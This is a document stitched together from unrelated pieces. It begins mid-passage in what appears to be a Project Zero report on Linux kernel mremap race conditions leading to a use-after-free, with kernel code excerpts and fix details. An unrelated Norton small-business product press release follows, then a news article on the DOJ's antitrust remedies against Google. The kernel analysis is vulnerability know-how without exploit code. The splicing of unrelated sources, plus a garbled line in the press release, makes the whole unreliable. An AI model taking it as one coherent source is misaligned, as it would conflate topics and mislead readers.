then munmap() VMA 1, you'll end up with an anonymous page that's only mapped into a VMA that is not associated with the page's anon_vma, which leads to kernel UAF. (See https://project-zero.issues.chromium.org/issues/42451486 and https://git.kernel.org/linus/2555283eb40d .)I think the exploitability of this bug depends on whether a struct page has been allocated for physical address 0 - but that seems to be the case at least on the two X86 systems I tested this on.Non-issue 2 (no impact): move_ptes vs MADVISE_COLLAPSEmove_ptes() locks the source and destination page tables as follows:        old_pte = pte_offset_map_lock(mm, old_pmd, old_addr, &old_ptl);        if (!old_pte)                return -EAGAIN;        new_pte = pte_offset_map_nolock(mm, new_pmd, new_addr, &new_ptl);        if (!new_pte) {                pte_unmap_unlock(old_pte, old_ptl);                return -EAGAIN;        }        if (new_ptl != old_ptl)                spin_lock_nested(new_ptl, SINGLE_DEPTH_NESTING);pte_offset_map_nolock() followed by manually taking the page table lock does not (unlike pte_offset_map_lock()) protect against concurrent removal of the page table via retract_page_tables(); and that can happen when need_rmap_locks is false. So I think that after this block, we can end up with new_pte pointing to a page table that has already been scheduled for RCU-delayed freeing. The good news is that (as far as I understand) this can only happen when all the PTEs in the source page table are pte_none(), so no PTEs will actually be written to the detached destination page table, so nothing bad happens.Non-issue 3 (probably no impact, untested): move_huge_pmd vs split_huge_page_to_list_to_orderThe classic way mremap() used to work is:    We make a new VMA.    We move page table entries into the new VMA with move_page_tables(), creating page tables if necessary. Only page table entries are moved; the old page tables stay where they are.    If a page table allocation fails due to OOM, or if the ->mremap handler returns an error, we use move_page_tables() to move the page table entries back to the old VMA; this is expected to always succeed, since the old page tables still exist, so page table allocation should not happen.As a comment in move_page_tables() explains:/* * On error, move entries back from new area to old, * which will succeed since page tables still there, * and then proceed to unmap new area instead of old. */However, that does not hold in the following scenario, assuming that the architecture does not define HAVE_MOVE_PMD (which permits mremap() to move entire page tables):    move_vma() calls move_page_tables()    move_page_tables() moves an anonymous huge PMD entry.    move_page_tables() tries to move more page table entries, but page table allocation fails, and the function returns early.    Another racing process causes the huge PMD entry to be split via split_huge_page_to_list_to_order() (turning the huge PMD entry into a PMD entry pointing to a page table whose PTEs point to all the subpages).    move_vma() calls move_page_tables() in the reverse direction to move PTEs back.    move_page_tables() unexpectedly needs to allocate a new page table to move the PTEs generated by the huge PMD split, which again fails. PTEs are left behind in the destination area.    do_vmi_munmap() removes the temporary destination VMA and removes the left-behind PTEs in the destination area.So in the end, an anonymous page has erroneously disappeared from the VMA, but I think that doesn't lead to any major consequences.FWIW, the architectures that define HAVE_ARCH_TRANSPARENT_HUGEPAGE without also defining HAVE_MOVE_PMD are: mips, loongarch, s390, sparc64, arc, arm.I think similar things can probably also happen on x86/arm64 if, when moving PTEs back with move_pgt_entry(HPAGE_PMD, ...), we race with a concurrent split_huge_page_to_list_to_order() such that move_huge_pmd() fails at the __pmd_trans_huge_lock() and we fall back to the move_ptes() path.CommentsAll commentsja...@google.com <ja...@google.com> #2Oct 15, 2024 11:05AMThe fix for the security bug is currently in the MM tree at https://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm.git/commit/?id=9118e3ff1212add463770537519dce4aed51cf94 , on the mm-hotfixes-unstable branch.ja...@google.com <ja...@google.com> #3Oct 22, 2024 09:28AMMarked as fixed, reassigned to ja...@google.com.Fix landed as https://git.kernel.org/linus/6fa1066fc5d00cb9f1b0e83b7ff6ef98d26ba2aa ("mm/mremap: fix move_normal_pmd/retract_page_tables race").In stable releases:    6.6.58 (2024-10-22)    6.11.5 (2024-10-22)Related CVE Number: CVE-2024-50066.Credit: Jann Horn

Linux 6.6 Race Condition

PRESS RELEASE

TEMPE, Ariz. and PRAGUE, Nov. 21, 2024 /PRNewswire/ -- Norton, a leading Cyber Safety brand of Gen™ (NASDAQ: GEN), has launched the new Norton Small Business Premium, an all-in-one, easy-to-use cybersecurity plan specifically designed for entrepreneurs and small businesses. In addition to powerful device security, Norton Small Business Premium features 24/7 Business Tech Support, Financial Monitoring, Social Media Monitoring and more.

"More than half (56%)\* of small business owners report that cybersecurity threats impact their business. Unfortunately, not enough of these entrepreneurs and small businesses have cybersecurity in place, often due to their cost and complexity," said Leena Elias, Chief Product Officer at Gen. "Norton Small Business Premium not only takes the work out of securing your business, we also help when other IT issues crop up."

Cybersecurity is crucial for businesses to protect their sensitive data, networks, and digital assets from cyberthreats that can lead to unauthorized access to company networks, data breaches, financial losses, and reputation damage. To help protect businesses where they need it most, Norton Small Business Premium includes features such as:

*   24/7 Business Tech Support: Subscriptions include access to Norton experts five time as year. These experts are available 24/7 for remote IT support on your devices, network, and software.
    
*   Financial Monitoring: Get alerts so you can act quickly if we detect suspicious transactions on your company's bank accounts.   
    
*   Social Media Monitoring: Prevent your business social media profiles from being taken over by regularly monitoring for suspicious activities on your accounts. 
    
*   Device Security: Real-time antivirus helps protect your devices, and our firewall\* helps block cybercriminals from accessing your network.
    
*   Secure VPN: Work online and access websites more safely at home or on the go with bank-grade VPN encryption.
    
*   Additional features include Password Manager, Cloud Backup, performance enhancements and more.
    

Norton Small Business Premium doesn't require an IT specialist or cybersecurity knowledge to use. It's easy to install and runs seamlessly in the background on Windows, Mac, Android, and iOS, allowing you to focus on your business without slowing down operations. 

Norton recommends 10 tips for small business Cyber Safety: 

1.  Learn to spot signs of phishing and teach your employees
    
2.  Only click links or download attachments from known sources
    
3.  Avoid sharing personal information or private company data over email
    
4.  Always keep your operating system, applications, and drivers up-to-date
    
5.  Make sure your WiFi network is protected with a strong password
    
6.  Regularly back up your data
    
7.  Require employees to use a VPN when doing company work on a public WiFi network (think airports and coffee shops)
    
8.  Always use multi-factor-authentication for an extra layer of protection
    
9.  Don't neglect mobile devices – make sure they are password protected and use security software
    
10.  Invest in a cybersecurity solution such as Norton Small Business Premium
    

Norton Small Business Premium is available now with prices starting at $299.99/year with options for 6, 10 or 20-device plans. For more information, please visit norton.com/products/small-business.

About Norton   
Norton is a leading Cyber Safety brand of Gen™ (NASDAQ: GEN), a global company dedicated to powering Digital Freedom through its family of trusted consumer brands including Norton, Avast, LifeLock, Avira, AVG, ReputationDefender and CCleaner. Gen empowers people to live their digital lives safely, privately, and confidently today and for generations to come. Gen brings award-winning products and services in cybersecurity, online privacy and identity protection to more than 500 million users in more than 150 countries. Learn more at Norton.com and GenDigital.com.

You May Also Like

Norton Introduces Small Business Premium for Business-Grade Security

The DOJ proposes tough proposals in its antitrust lawsuit against Google, including selling the Chrome browser, limiting search…

The DOJ proposes tough proposals in its antitrust lawsuit against Google, including selling the Chrome browser, limiting search deals, and restructuring its operations to limit monopoly.

As part of its antitrust lawsuit against Google, the U.S. Department of Justice (DOJ) has proposed major changes that could entirely change the tech giant’s business structure and its role on the Internet.

The DOJ’s latest filing seeks the divestiture of key Google assets, including its Chrome browser, and calls for structural changes that could impact Android and its search operations. Google has strongly criticized the proposals, framing them as a threat to innovation, security, and consumer choice.

****Background of the Lawsuit****

The DOJ first filed its antitrust lawsuit against Google **in October 2020**, accusing the company of abusing its dominance in the search engine market to squash competition. The case focuses on Google’s search distribution agreements with major partners, such as Apple, Mozilla, and smartphone manufacturers, which allegedly back its **monopoly** by making Google Search the default on browsers and devices.

The DOJ argues that these practices harm competition by blocking rival search engines from gaining a foothold in the market. Central to the case is the allegation that Google’s actions prevent fair competition and innovation, ultimately harming consumers.

****What the DOJ Proposes****

Hackread.com analysed the DoJ’s **latest filing (PDF)**. Here’s what the Department has outlined and proposed to end Google’s dominance:

*   **Divestiture of Chrome and Possibly Android**: The DOJ suggests that Google sell its Chrome browser and its Android operating system to limit its control over internet access points.
*   **Search Choice Screens**: The proposal requires Google to implement choice screens, where users select their preferred search engine on devices like Google Pixel phones. This design must be approved by a newly proposed “Technical Committee.”
*   **Data Sharing Requirements**: Google would be required to share search data and innovations with competitors, including foreign companies.
*   **Ban on Default Search Agreements**: The DOJ aims to prohibit Google from entering into agreements with partners like Apple or Mozilla to make Google Search the default engine.

The DOJ has framed these measures as necessary to ensure fair competition and restore balance to the digital marketplace.

****Google’s Response****

In response, Google has strongly pushed back against the DOJ’s proposals, describing them as extreme, radical interventionist agenda, and harmful to consumers. In a **blog post** published November 11, 2024, Google argued that the proposals would:

*   **Compromise Privacy and Security**: Divesting Chrome and Android could lead to increased risks for user data and diminish the security features Google has built into these platforms.
*   **Stifle Innovation**: Google warned that the measures could chill investment in cutting-edge technologies, particularly in artificial intelligence, where the company is a global leader.
*   **Hurt Partners and Developers**: Google claims the proposals would harm partners like Mozilla, whose Firefox browser relies on revenue from Google’s search placement agreements.
*   **Introduce Overregulation**: Google criticized the creation of a Technical Committee with broad powers to oversee its operations as an unprecedented overreach.

Google maintains that its dominance in the search market is due to offering “the industry’s highest quality search engine,” not through unfair practices. The company plans to submit its own proposals and continue its legal battle into the next year.

> DOJ had a chance to propose remedies related to the issue in this case: search distribution agreements. Instead, DOJ chose to push a radical interventionist agenda that would harm Americans and America’s global technology leadership. https://t.co/QslGbUyklR
> 
> — News from Google (@NewsFromGoogle) November 21, 2024

****Industry-Wide Implications****

If the DOJ’s proposals are implemented, the tech industry could see a major change in power dynamics and business practices:

*   **Impact on Browser and Operating System Markets**: Forcing Google to sell Chrome and potentially Android would create opportunities for competitors, but it might also disrupt the user experience for millions who rely on Google’s integrated ecosystem.
*   **Search Market Competition**: Measures like search choice screens could pave the way for smaller search engines to gain traction, but critics argue that such interventions may confuse users and lead to inferior experiences.
*   **AI Development**: Google’s claims about reduced AI investment could have far-reaching consequences for advancements in automation, machine learning, and related industries.
*   **Global Technology Leadership**: The case raises concerns about U.S. competitiveness in technology, as the remedies could weaken one of the nation’s largest and most influential tech companies.

Nevertheless, the DOJ’s proposals mean a straightforward measure to limit one of the most powerful companies in the world, but the battle is far from over. Google has vowed to contest the measures, and the case will likely drag on for months if not years.

This legal battle will also challenge how we balance competition and innovation in the tech world. Its outcome could change how we use technology and online search for years to come.

1.  **ChatGPT’s Training Methods Challenged in Lawsuit**
2.  **Google Incognito: New Disclaimer Reveals Data Tracking**
3.  **$4B lawsuit claims Google tracked iPhone users’ activities**
4.  **DuckDuckGo says Google Incognito searches are not private**
5.  **HP Monopoly on Ink, Alleges 3rd-Party Cartridge Malware Risk**

Tag

#android